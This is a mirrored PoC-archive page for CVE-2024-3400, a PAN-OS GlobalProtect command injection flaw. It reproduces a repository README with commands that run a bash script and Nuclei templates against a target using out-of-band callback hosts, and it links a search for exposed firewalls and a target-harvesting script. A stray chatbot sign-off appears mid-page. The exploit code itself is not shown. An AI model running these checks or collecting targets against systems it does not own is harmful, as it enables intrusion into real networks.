Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-3400 PoC — PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect

Source
https://github.com/schooldropout1337/CVE-2024-3400
Associated Vulnerability
Title:PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect (CVE-2024-3400)
Description:A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Readme
# CVE-2024-3400

![POC](https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE-2024-3400-POC-1.jpg)

![telemet](https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE-2024-3400-Nuclei-Template.jpg)
# Description

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

# CVE-2024-3400 Nuclei Template for Palo Alto PAN-OS Vulnerability

This repository contains a Nuclei Template designed to detect vulnerabilities related to Palo Alto PAN-OS bugs, specifically targeting CVE-2024-3400. 

A comprehensive list of research was done by

[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis

[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

## Vulnerabilities Detected

- **0 Byte File Creation**: This vulnerability allows for the creation of a 0-byte file via a Curl request in a Bash file.
- **OS Command Injection**: The Nuclei Template detects potential OS command injection vulnerabilities.

## Usage

### Bash Script

Execute the following command to run the Bash script:
```sh
./CVE-2024-3400.sh http://target
or
sh CVE-2024-3400.sh http://target
```

The script will check if a file is created (returning a 200 OK status). If successful, it will then verify if the file exists (returning a 403 Forbidden status).

### Nuclei Template - telemet.yaml

1. Start an Interact Server:

```sh
interactsh-client -v
```

2. Run the Nuclei Template:

```sh
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
```

3. Boom Boom Template! (GET subdomain from https://dig.pm)

```sh
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org
```

## Potential Targets

A list of potential targets can be found [here](https://en.fofa.info/result?qbase64=YmFubmVyPSJHbG9iYWwgUHJvdGVjdCI%3D).

```sh
python fofax3r.py
```

## Author

- **Author**: 자전거, 自転車, 自行车

```

This README.md provides information on the vulnerability, how to use the provided scripts, potential targets, and credits the author. Let me know if you need any further adjustments!
File Snapshot

 [4.0K]  /data/pocs/ac0485caad41e12ed249553a7fa8925c81d50963
├── [351K]  CVE-2024-3400-Nuclei-Template.jpg
├── [140K]  CVE-2024-3400-POC-1.jpg
├── [ 844]  CVE-2024-3400.sh
├── [1.7K]  CVE20243400.yaml
├── [1.7K]  fofax3r.py
├── [2.4K]  README.md
└── [ 733]  telemet.yaml

0 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →